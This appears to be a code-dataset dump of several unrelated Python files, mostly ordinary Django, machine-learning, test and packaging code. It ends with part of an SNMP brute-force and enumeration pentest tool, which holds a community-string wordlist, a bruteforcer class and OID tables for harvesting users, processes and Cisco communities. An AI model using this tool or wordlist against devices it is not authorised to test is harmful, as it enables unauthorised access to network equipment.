content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
from __future__ import unicode_literals
import logging
from inspect import ismethod
from django.core.urlresolvers import (reverse, resolve, NoReverseMatch,
Resolver404)
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.encoding import smart_text
from django.utils.translation import ugettext as _
from django.db.models import Model
from django import template
from django import template
from django.core.urlresolvers import reverse_lazy
from content.models import Language, Category
# Get instance of logger
logger = logging.getLogger('project_logger')
register = template.Library()
@register.simple_tag(takes_context=True)
def show_menu(context):
categories = [cat.slug for cat in Category.objects.all()]
path= context['request'].path
return {'categories': categories,'path':path}
@register.inclusion_tag('navbar.html', takes_context=True)
def show_categories(context):
categories = [cat for cat in Category.objects.all()]
path= context['request'].path
print "show_categoried --- path", path
return {'categories': categories, 'path':path}
@register.inclusion_tag('navbar.html', takes_context=True)
def show_navbar(context):
languages = [lang for lang in Language.objects.all()]
categories = [cat for cat in Category.objects.all()]
subcategories = []# [subcat for subcat in SubCategory.objects.all()]
path = context['request'].path
return { 'languages': languages, 'categories': categories, 'subcategories':subcategories, 'path':path, 'path_lang':context['path_language'], 'path_cat':context['path_category'], 'path_subcat':context['path_subcategory'] }
@register.simple_tag(takes_context=True)
def active_page(context, req):
request = context['request']
#print "path", request
#if not request:
# logger.error('Cant find request - needed for active page css')
logger.error('dsfds %s' % request.path)
return "active"
#try:
# return "active"
#return "active" if resolve(request.path_info).url_name == view_name else ""
#except Resolver404:
# return ""
@register.filter(name='is_empty')
def is_empty(value):
""" Checks whether value is empty. Should be string. """
logger.info('is_empty value:%s' % value )
if not value.strip(' '):
return True
else:
return False
CONTEXT_KEY = 'DJANGO_BREADCRUMB_LINKS'
MAX_WIDTH_BREADCRUMBS=1200
MAX_WIDTH_BREADCRUMB=200
@register.simple_tag(takes_context=True)
def render_breadcrumbs(context, *args):
"""
Render breadcrumbs html using twitter bootstrap css classes.
NOTE: Breadcrumb MUST end with a '/'
"""
if not 'request' in context:
logger.error("request object not found in context! Check if "
"'django.core.context_processors.request' is in "
"TEMPLATE_CONTEXT_PROCESSORS")
return ''
logger.info('This is path: %s' % context['request'].path)
current_app = context['request'].resolver_match.namespace
print current_app
#url = reverse(viewname="content:python", current_app=current_app)
#print url
# remove trailing /
links=[]
href=""
for url in context['request'].path.lstrip('/').rstrip('/').split('/'):
href += url + '/'
links.append((href, _(smart_text(url)) if url else url))
orig_links = links
print links
# HACK: FOR MAX LENGTH OF BREADCRUMBS for rendering
# Here we change the start to ...
if len(links) > (MAX_WIDTH_BREADCRUMBS/MAX_WIDTH_BREADCRUMB):
#logger.info('len links: %s %s', len(links), links)
#print "max ", (MAX_WIDTH_BREADCRUMBS/MAX_WIDTH_BREADCRUMB)
no_to_remove = len(links) - (MAX_WIDTH_BREADCRUMBS/MAX_WIDTH_BREADCRUMB)
#print no_to_remove
#for i in range(len(links)):
# print links[i]
href = links[no_to_remove-1][0]
del links[0:no_to_remove]
links.insert(0, (href, "..."))
if not links: return ''
return mark_safe(template.loader.render_to_string(
'navbar.html', {'breadcrumbs': links,
'breadcrumbs_total': len(orig_links)}))
# if args:
# template_path = args[0]
# else:
# template_path = 'django_bootstrap_breadcrumbs/bootstrap2.html'
# print "befor elubjkks [p"
# links = []
# for (label, viewname, view_args) in context['request'].META.get(CONTEXT_KEY, []):
# if isinstance(viewname, Model) and hasattr(
# viewname, 'get_absolute_url') and ismethod(
# viewname.get_absolute_url):
# url = viewname.get_absolute_url()
# print "fndsnflksnkfnsdjdjdjjdpopopopop"
# else:
# try:
# try:
# # 'resolver_match' introduced in Django 1.5
# current_app = context['request'].resolver_match.namespace
# logger.info('%s' % current_app)
# except AttributeError:
# try:
# resolver_match = resolve(context['request'].path)
# print resolver_match, "jkjdlsfjjlsdkjlfkjlskjfljsdljfldjslkjfkldsj"
# current_app = resolver_match.namespace
# logger.info('%s' % current_app)
# except Resolver404:
# print '404'
# current_app = None
# url = reverse(viewname=viewname, args=view_args,
# current_app=current_app)
# except NoReverseMatch:
# url = viewname
# links.append((url, _(smart_text(label)) if label else label))
# logger.warning('fdskljfldsjlkfjdkls %s' % links )
# if not links:
# return ''
# return mark_safe(template.loader.render_to_string(
# template_path, {'breadcrumbs': links,
# 'breadcrumbs_total': len(links)}))
|
python
|
from sklearn.model_selection import GridSearchCV
from luciferml.supervised import classification as cls
def hyperTune(classifier, parameters, X_train, y_train, cv_folds, tune_mode, isReg):
"""
Takes classifier, tune-parameters, Training Data and no. of folds as input and Performs GridSearch Crossvalidation.
"""
try:
scoring = 'accuracy'
if isReg:
scoring = 'r2'
print(
'Applying Grid Search Cross validation on Mode {} [*]'.format(tune_mode))
grid_search = GridSearchCV(
estimator=classifier,
param_grid=parameters,
scoring=scoring,
cv=cv_folds,
n_jobs=-1,
verbose=4,
)
grid_search.fit(X_train, y_train)
best_accuracy = grid_search.best_score_
best_parameters = grid_search.best_params_
print("Best Accuracy: {:.2f} %".format(best_accuracy*100))
print("Best Parameters:", best_parameters)
print('Applying Grid Search Cross validation [', u'\u2713', ']\n')
# if tune_mode == 3:
# print('############################################### \n')
# print('Re-running classifier with these params\n')
return best_parameters
except Exception as error:
print('HyperParam Tuning Failed with Error: ', error,'\n')
|
python
|
import os.path
import logging
from utils import make_id, get_resource
from os.path import join
logger = logging.getLogger(__name__)
def apps_dir():
return os.path.dirname(os.path.abspath(__file__))
def load_app(app_def_file, app_id=None, parent_group="/"):
"""Loads an app definition from a json file and sets the app id."""
app_path = os.path.join(apps_dir(), "{}.json".format(app_def_file))
app = get_resource(app_path)
if app_id is None:
app['id'] = make_id(app_def_file, parent_group)
else:
app['id'] = join(parent_group, app_id)
logger.info('Loaded an app definition with id={}'.format(app['id']))
return app
def mesos_app(app_id=None, parent_group="/"):
return load_app('mesos-app', app_id, parent_group)
def http_server(app_id=None, parent_group="/"):
return load_app('http-server', app_id, parent_group)
def docker_http_server(app_id=None, parent_group="/"):
return load_app('docker-http-server', app_id, parent_group)
def healthcheck_and_volume(app_id=None, parent_group="/"):
return load_app('healthcheck-and-volume', app_id, parent_group)
def ucr_docker_http_server(app_id=None, parent_group="/"):
return load_app('ucr-docker-http-server', parent_group="/")
def sleep_app(app_id=None, parent_group="/"):
return load_app('sleep-app', app_id, parent_group)
def docker_nginx_ssl(app_id=None, parent_group="/"):
return load_app('docker-nginx-ssl', app_id, parent_group)
def resident_docker_app(app_id=None, parent_group="/"):
return load_app('resident-docker-app', app_id, parent_group)
def persistent_volume_app(app_id=None, parent_group="/"):
return load_app('persistent-volume-app', app_id, parent_group)
def readiness_and_health_app(app_id=None, parent_group="/"):
return load_app('readiness-and-health-app', app_id, parent_group)
def private_docker_app(app_id=None, parent_group="/"):
return load_app('private-docker-app', app_id, parent_group)
def private_ucr_docker_app(app_id=None, parent_group="/"):
return load_app('private-ucr-docker-app', app_id, parent_group)
def pinger_localhost_app(app_id=None, parent_group="/"):
return load_app('pinger-localhost-app', app_id, parent_group)
def pinger_bridge_app(app_id=None, parent_group="/"):
return load_app('pinger-bridge-app', app_id, parent_group)
def pinger_container_app(app_id=None, parent_group="/"):
return load_app('pinger-container-app', app_id, parent_group)
def fake_framework(app_id=None, parent_group="/"):
return load_app('fake-framework', app_id, parent_group)
def external_volume_mesos_app(app_id=None, parent_group="/"):
return load_app('external-volume-mesos-app', app_id, parent_group)
def ipv6_healthcheck(app_id=None, parent_group="/"):
""" The app uses netcat to listen on port. It uses alpine image which has netcat with ipv6 support by default.
It uses command nc (shortcut for netcat) that runs for every new connection an echo command in shell.
For more information about the nc options just run `docker run alpine nc --help`
"""
return load_app('ipv6-healthcheck', app_id, parent_group)
def app_with_https_readiness_checks(app_id=None, parent_group="/"):
return load_app('app-with-https-readiness-checks', app_id, parent_group)
|
python
|
from abc import ABCMeta
import numpy as np
from torch.utils.data import ConcatDataset, Dataset, WeightedRandomSampler
from mmpose.datasets.builder import DATASETS
from .mesh_base_dataset import MeshBaseDataset
@DATASETS.register_module()
class MeshMixDataset(Dataset, metaclass=ABCMeta):
"""Mix Dataset for 3D human mesh estimation.
The dataset combines data from multiple datasets (MeshBaseDataset) and
sample the data from different datasets with the provided proportions.
The dataset loads raw features and apply specified transforms
to return a dict containing the image tensors and other information.
Args:
configs (list): List of configs for multiple datasets.
partition (list): Sample proportion of multiple datasets. The length
of partition should be same with that of configs. The elements
of it should be non-negative and is not necessary summing up to
one.
Example:
>>> from mmpose.datasets import MeshMixDataset
>>> data_cfg = dict(
>>> image_size=[256, 256],
>>> iuv_size=[64, 64],
>>> num_joints=24,
>>> use_IUV=True,
>>> uv_type='BF')
>>>
>>> mix_dataset = MeshMixDataset(
>>> configs=[
>>> dict(
>>> ann_file='tests/data/h36m/test_h36m.npz',
>>> img_prefix='tests/data/h36m',
>>> data_cfg=data_cfg,
>>> pipeline=[]),
>>> dict(
>>> ann_file='tests/data/h36m/test_h36m.npz',
>>> img_prefix='tests/data/h36m',
>>> data_cfg=data_cfg,
>>> pipeline=[]),
>>> ],
>>> partition=[0.6, 0.4])
"""
def __init__(self, configs, partition):
"""Load data from multiple datasets."""
assert min(partition) >= 0
datasets = [MeshBaseDataset(**cfg) for cfg in configs]
self.dataset = ConcatDataset(datasets)
self.length = max(len(ds) for ds in datasets)
weights = [
np.ones(len(ds)) * p / len(ds)
for (p, ds) in zip(partition, datasets)
]
weights = np.concatenate(weights, axis=0)
self.sampler = WeightedRandomSampler(weights, 1)
def __len__(self):
"""Get the size of the dataset."""
return self.length
def __getitem__(self, idx):
"""Given index, sample the data from multiple datasets with the given
proportion."""
idx_new = list(self.sampler)[0]
return self.dataset[idx_new]
|
python
|
# coding: utf-8
# pylint: disable=missing-docstring
# pylint: disable=invalid-name
import os
import glob
import subprocess
from setuptools import setup, find_packages
about = {}
HERE = os.path.abspath(os.path.dirname(__file__))
with open(file=os.path.join(HERE, 'src','dima', '__version__.py'), mode='r', encoding='utf-8') as f:
exec(f.read(), about) # pylint: disable=exec-used
with open(file='README.md', mode='r', encoding='utf-8') as f:
readme = f.read()
requires = []
def _verify_platform():
cmd = ['uname', '-m']
output = subprocess.check_output(cmd, shell=True).decode("utf-8")
if output == 'x86_64':
requires.append('PyQt5 == 5.15.2')
elif output == 'armv7l': # raspian buster
pass
def main():
_verify_platform()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
python_requires=">=3.6",
license=about['__license__'],
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
packages=find_packages(where='src'),
package_dir={'': 'src'},
data_files=[
('dima/dima_frontend/ui/', list(glob.glob('src/dima/dima_frontend/ui/*'))),
('dima/', list(glob.glob('src/dima/dima.conf'))),
],
include_package_data=True,
scripts=[
'bin/dima',
],
install_requires=requires,
)
if __name__ == '__main__':
main()
|
python
|
import logging
from os.path import expanduser
from git import InvalidGitRepositoryError
from pythoncommons.file_utils import FileUtils
from pythoncommons.git_wrapper import GitWrapper
LOG = logging.getLogger(__name__)
class FormatPatchSaver:
"""
A class used to export git-format-patch files from a git repository to a specified target directory.
Attributes
----------
base_refspec : str
The refspec to use as the base git reference for format-patch comparison.
Specified with args.
other_refspec : str
The refspec to use as the ending git reference for format-patch comparison.
Specified with args.
dest_basedir : str
Base directory of the format-patch result files.
Specified with args.
dest_dir_prefix : str
Jira ID of the upstream jira to backport.
Specified with args.
working_dir : str
Path to the git repository.
dir_suffix : str
The final directory to put the results into.
repo : GitWrapper
A GitWrapper object, representing the repository.
patch_file_dest_dir : str
A path, pointing to the final directory where the format-patch results will be placed.
Methods
-------
run()
Executes this command.
The steps are roughly are:
1. Ensure that the provided working directory is a directory that contains a git repository.
2. Validate refspecs, ensuring that the two refspecs are different and pointing to a valid commit or branch.
3. Ensure that the destination directory is created.
4. Execute git format-patch and save the result files to the target directory.
"""
def __init__(self, args, working_dir, dir_suffix):
# Coming from args
self.base_refspec = args.base_refspec
self.other_refspec = args.other_refspec
self.dest_basedir = args.dest_basedir
self.dest_dir_prefix = args.dest_dir_prefix
self.working_dir = working_dir
self.dir_suffix = dir_suffix
# Dynamic attributes
self.repo = None
self.patch_file_dest_dir = None
def run(self):
# TODO check if git is clean (no modified, unstaged files, etc)
self.ensure_git_repository()
self.validate_refspecs()
self.ensure_dest_dir_is_created()
self.run_format_patch()
def ensure_git_repository(self):
try:
repo = GitWrapper(self.working_dir)
self.repo = repo
except InvalidGitRepositoryError:
raise ValueError(f"Current working directory is not a git repo: {self.working_dir}")
def validate_refspecs(self):
if self.base_refspec == self.other_refspec:
raise ValueError(
f"Specified base refspec '{self.base_refspec}' is the same as other refspec '{self.other_refspec}'"
)
exists = self.repo.is_branch_exist(self.base_refspec)
if not exists:
raise ValueError(f"Specified base refspec is not valid: {self.base_refspec}")
exists = self.repo.is_branch_exist(self.other_refspec)
if not exists:
raise ValueError(f"Specified other refspec is not valid: {self.base_refspec}")
def ensure_dest_dir_is_created(self):
dest_basedir = expanduser(self.dest_basedir)
self.patch_file_dest_dir = FileUtils.join_path(dest_basedir, self.dest_dir_prefix, self.dir_suffix)
FileUtils.ensure_dir_created(self.patch_file_dest_dir)
def run_format_patch(self):
refspec = f"{self.base_refspec}..{self.other_refspec}"
LOG.info("Saving git patches based on refspec '%s', to directory: %s", refspec, self.patch_file_dest_dir)
self.repo.format_patch(refspec, output_dir=self.patch_file_dest_dir, full_index=True)
|
python
|
"""Test the Cloudflare config flow."""
from pycfdns.exceptions import (
CloudflareAuthenticationException,
CloudflareConnectionException,
CloudflareZoneException,
)
from homeassistant.components.cloudflare.const import CONF_RECORDS, DOMAIN
from homeassistant.config_entries import SOURCE_REAUTH, SOURCE_USER
from homeassistant.const import CONF_API_TOKEN, CONF_SOURCE, CONF_ZONE
from homeassistant.data_entry_flow import (
RESULT_TYPE_ABORT,
RESULT_TYPE_CREATE_ENTRY,
RESULT_TYPE_FORM,
)
from homeassistant.setup import async_setup_component
from . import (
ENTRY_CONFIG,
USER_INPUT,
USER_INPUT_RECORDS,
USER_INPUT_ZONE,
_patch_async_setup_entry,
)
from tests.common import MockConfigEntry
async def test_user_form(hass, cfupdate_flow):
"""Test we get the user initiated form."""
await async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "user"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "zone"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT_ZONE,
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "records"
assert result["errors"] is None
with _patch_async_setup_entry() as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT_RECORDS,
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_CREATE_ENTRY
assert result["title"] == USER_INPUT_ZONE[CONF_ZONE]
assert result["data"]
assert result["data"][CONF_API_TOKEN] == USER_INPUT[CONF_API_TOKEN]
assert result["data"][CONF_ZONE] == USER_INPUT_ZONE[CONF_ZONE]
assert result["data"][CONF_RECORDS] == USER_INPUT_RECORDS[CONF_RECORDS]
assert result["result"]
assert result["result"].unique_id == USER_INPUT_ZONE[CONF_ZONE]
assert len(mock_setup_entry.mock_calls) == 1
async def test_user_form_cannot_connect(hass, cfupdate_flow):
"""Test we handle cannot connect error."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = CloudflareConnectionException()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "cannot_connect"}
async def test_user_form_invalid_auth(hass, cfupdate_flow):
"""Test we handle invalid auth error."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = CloudflareAuthenticationException()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "invalid_auth"}
async def test_user_form_invalid_zone(hass, cfupdate_flow):
"""Test we handle invalid zone error."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = CloudflareZoneException()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "invalid_zone"}
async def test_user_form_unexpected_exception(hass, cfupdate_flow):
"""Test we handle unexpected exception."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = Exception()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "unknown"}
async def test_user_form_single_instance_allowed(hass):
"""Test that configuring more than one instance is rejected."""
entry = MockConfigEntry(domain=DOMAIN, data=ENTRY_CONFIG)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={CONF_SOURCE: SOURCE_USER},
data=USER_INPUT,
)
assert result["type"] == RESULT_TYPE_ABORT
assert result["reason"] == "single_instance_allowed"
async def test_reauth_flow(hass, cfupdate_flow):
"""Test the reauthentication configuration flow."""
entry = MockConfigEntry(domain=DOMAIN, data=ENTRY_CONFIG)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={
"source": SOURCE_REAUTH,
"unique_id": entry.unique_id,
"entry_id": entry.entry_id,
},
data=entry.data,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
with _patch_async_setup_entry() as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_API_TOKEN: "other_token"},
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
assert entry.data[CONF_API_TOKEN] == "other_token"
assert entry.data[CONF_ZONE] == ENTRY_CONFIG[CONF_ZONE]
assert entry.data[CONF_RECORDS] == ENTRY_CONFIG[CONF_RECORDS]
assert len(mock_setup_entry.mock_calls) == 1
|
python
|
#!/usr/bin/env python
# Requires metasploit, snmpwalk, snmpstat and John the Ripper
# _____ _ ____ _______ ____ __
# / ___// | / / |/ / __ \ / __ )_______ __/ /____
# \__ \/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \
# ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/
#/____/_/ |_/_/ /_/_/ /_____/_/ \__,_/\__/\___/
#
# SNMP Bruteforce & Enumeration Script
# http://www.secforce.com / nikos.vassakis <at> secforce.com
# ##########################################################
__version__ = 'v1.0b'
from socket import socket, SOCK_DGRAM, AF_INET, timeout
from random import randint
from time import sleep
import optparse, sys, os
from subprocess import Popen, PIPE
import struct
import threading, thread
import tempfile
from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
SNMPset, SNMPbulk, IP)
##########################################################################################################
# Defaults
##########################################################################################################
class defaults:
rate=250.0
timeOut=1.0
port=161
delay=2
interactive=True
verbose=False
getcisco=True
colour=True
default_communities=['','0','0392a0','1234','2read','3com','3Com','3COM','4changes','access','adm','admin','Admin','administrator','agent','agent_steal','all','all private','all public','anycom','ANYCOM','apc','bintec','blue','boss','c','C0de','cable-d','cable_docsispublic@es0','cacti','canon_admin','cascade','cc','changeme','cisco','CISCO','cmaker','comcomcom','community','core','CR52401','crest','debug','default','demo','dilbert','enable','entry','field','field-service','freekevin','friend','fubar','guest','hello','hideit','host','hp_admin','ibm','IBM','ilmi','ILMI','intel','Intel','intermec','Intermec','internal','internet','ios','isdn','l2','l3','lan','liteon','login','logon','lucenttech','lucenttech1','lucenttech2','manager','master','microsoft','mngr','mngt','monitor','mrtg','nagios','net','netman','network','nobody','NoGaH$@!','none','notsopublic','nt','ntopia','openview','operator','OrigEquipMfr','ourCommStr','pass','passcode','password','PASSWORD','pr1v4t3','pr1vat3','private',' private','private ','Private','PRIVATE','private@es0','Private@es0','private@es1','Private@es1','proxy','publ1c','public',' public','public ','Public','PUBLIC','public@es0','public@es1','public/RO','read','read-only','readwrite','read-write','red','regional','<removed>','rmon','rmon_admin','ro','root','router','rw','rwa','sanfran','san-fran','scotty','secret','Secret','SECRET','Secret C0de','security','Security','SECURITY','seri','server','snmp','SNMP','snmpd','snmptrap','snmp-Trap','SNMP_trap','SNMPv1/v2c','SNMPv2c','solaris','solarwinds','sun','SUN','superuser','supervisor','support','switch','Switch','SWITCH','sysadm','sysop','Sysop','system','System','SYSTEM','tech','telnet','TENmanUFactOryPOWER','test','TEST','test2','tiv0li','tivoli','topsecret','traffic','trap','user','vterm1','watch','watchit','windows','windowsnt','workstation','world','write','writeit','xyzzy','yellow','ILMI']
##########################################################################################################
# OID's
##########################################################################################################
''' Credits
Some OID's borowed from Cisc0wn script
# Cisc0wn - The Cisco SNMP 0wner.
# Daniel Compton
# www.commonexploits.com
# [email protected]
'''
RouteOIDS={
'ROUTDESTOID': [".1.3.6.1.2.1.4.21.1.1", "Destination"],
'ROUTHOPOID': [".1.3.6.1.2.1.4.21.1.7", "Next Hop"],
'ROUTMASKOID': [".1.3.6.1.2.1.4.21.1.11", "Mask"],
'ROUTMETOID': [".1.3.6.1.2.1.4.21.1.3", "Metric"],
'ROUTINTOID': [".1.3.6.1.2.1.4.21.1.2", "Interface"],
'ROUTTYPOID': [".1.3.6.1.2.1.4.21.1.8", "Route type"],
'ROUTPROTOID': [".1.3.6.1.2.1.4.21.1.9", "Route protocol"],
'ROUTAGEOID': [".1.3.6.1.2.1.4.21.1.10", "Route age"]
}
InterfaceOIDS={
#Interface Info
'INTLISTOID': [".1.3.6.1.2.1.2.2.1.2", "Interfaces"],
'INTIPLISTOID': [".1.3.6.1.2.1.4.20.1.1", "IP address"],
'INTIPMASKOID': [".1.3.6.1.2.1.4.20.1.3", "Subnet mask"],
'INTSTATUSLISTOID':[".1.3.6.1.2.1.2.2.1.8", "Status"]
}
ARPOIDS={
# Arp table
'ARPADDR': [".1.3.6.1.2.1.3.1 ","ARP address method A"],
'ARPADDR2': [".1.3.6.1.2.1.3.1 ","ARP address method B"]
}
OIDS={
'SYSTEM':["iso.3.6.1.2.1.1 ","SYSTEM Info"]
}
snmpstat_args={
'Interfaces':["-Ci","Interface Info"],
'Routing':["-Cr","Route Info"],
'Netstat':["","Netstat"],
#'Statistics':["-Cs","Stats"]
}
'''Credits
The following OID's are borrowed from snmpenum.pl script
# ----by filip waeytens 2003----
# ---- DA SCANIT CREW www.scanit.be ----
# [email protected]
'''
WINDOWS_OIDS={
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
'INSTALLED SOFTWARE': ["1.3.6.1.2.1.25.6.3.1.2","Installed Software"],
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'DOMAIN': ["1.3.6.1.4.1.77.1.4.1","Domain"],
'USERS': ["1.3.6.1.4.1.77.1.2.25","Users"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'SHARES': ["1.3.6.1.4.1.77.1.2.27","Shares"],
'DISKS': ["1.3.6.1.2.1.25.2.3.1.3","Disks"],
'SERVICES': ["1.3.6.1.4.1.77.1.2.3.1.1","Services"],
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"],
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"]
}
LINUX_OIDS={
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'MOUNTPOINTS': ["1.3.6.1.2.1.25.2.3.1.3","MountPoints"],
'RUNNING SOFTWARE PATHS': ["1.3.6.1.2.1.25.4.2.1.4","Running Software Paths"],
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"],
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"]
}
CISCO_OIDS={
'LAST TERMINAL USERS': ["1.3.6.1.4.1.9.9.43.1.1.6.1.8","Last Terminal User"],
'INTERFACES': ["1.3.6.1.2.1.2.2.1.2","Interfaces"],
'SYSTEM INFO': ["1.3.6.1.2.1.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'SNMP Communities': ["1.3.6.1.6.3.12.1.3.1.4","Communities"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'IP ADDRESSES': ["1.3.6.1.2.1.4.20.1.1","IP Addresses"],
'INTERFACE DESCRIPTIONS': ["1.3.6.1.2.1.31.1.1.1.18","Interface Descriptions"],
'HARDWARE': ["1.3.6.1.2.1.47.1.1.1.1.2","Hardware"],
'TACACS SERVER': ["1.3.6.1.4.1.9.2.1.5","TACACS Server"],
'LOG MESSAGES': ["1.3.6.1.4.1.9.9.41.1.2.3.1.5","Log Messages"],
'PROCESSES': ["1.3.6.1.4.1.9.9.109.1.2.1.1.2","Processes"],
'SNMP TRAP SERVER': ["1.3.6.1.6.3.12.1.2.1.7","SNMP Trap Server"]
}
##########################################################################################################
# Classes
##########################################################################################################
class SNMPError(Exception):
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
pass
class SNMPVersion:
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
v1 = 0
v2c = 1
v3 = 2
@classmethod
def iversion(cls, v):
if v in ['v1', '1']:
return cls.v1
elif v in ['v2', '2', 'v2c']:
return cls.v2c
elif v in ['v3', '3']:
return cls.v3
raise ValueError('No such version %s' % v)
@classmethod
def sversion(cls, v):
if not v:
return 'v1'
elif v == 1:
return 'v2c'
elif v == 2:
return 'v3'
raise ValueError('No such version number %s' % v)
class SNMPBruteForcer(object):
#This class is used for the sploitego method of bruteforce (--sploitego)
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
def __init__(self, agent, port=161, version='v2c', timeout=0.5, rate=1000):
self.version = SNMPVersion.iversion(version)
self.s = socket(AF_INET, SOCK_DGRAM)
self.s.settimeout(timeout)
self.addr = (agent, port)
self.rate = rate
def guess(self, communities):
p = SNMP(
version=self.version,
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
r = []
for c in communities:
i = randint(0, 2147483647)
p.PDU.id = i
p.community = c
self.s.sendto(str(p), self.addr)
sleep(1/self.rate)
while True:
try:
p = SNMP(self.s.recvfrom(65535)[0])
except timeout:
break
r.append(p.community.val)
return r
def __del__(self):
self.s.close()
class SNMPResults:
addr=''
version=''
community=''
write=False
def __eq__(self, other):
return self.addr == other.addr and self.version == other.version and self.community == other.community
##########################################################################################################
# Colour output functions
##########################################################################################################
# for color output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
#following from Python cookbook, #475186
def has_colours(stream):
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# guess false in case of error
return False
has_colours = has_colours(sys.stdout)
def printout(text, colour=WHITE):
if has_colours and defaults.colour:
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m\n"
sys.stdout.write(seq)
else:
#sys.stdout.write(text)
print text
##########################################################################################################
#
##########################################################################################################
def banner(art=True):
if art:
print >> sys.stderr, " _____ _ ____ _______ ____ __ "
print >> sys.stderr, " / ___// | / / |/ / __ \\ / __ )_______ __/ /____ "
print >> sys.stderr, " \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\"
print >> sys.stderr, " ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/"
print >> sys.stderr, "/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ "
print >> sys.stderr, ""
print >> sys.stderr, "SNMP Bruteforce & Enumeration Script " + __version__
print >> sys.stderr, "http://www.secforce.com / nikos.vassakis <at> secforce.com"
print >> sys.stderr, "###############################################################"
print >> sys.stderr, ""
def listener(sock,results):
while True:
try:
response,addr=SNMPrecv(sock)
except timeout:
continue
except KeyboardInterrupt:
break
except:
break
r=SNMPResults()
r.addr=addr
r.version=SNMPVersion.sversion(response.version.val)
r.community=response.community.val
results.append(r)
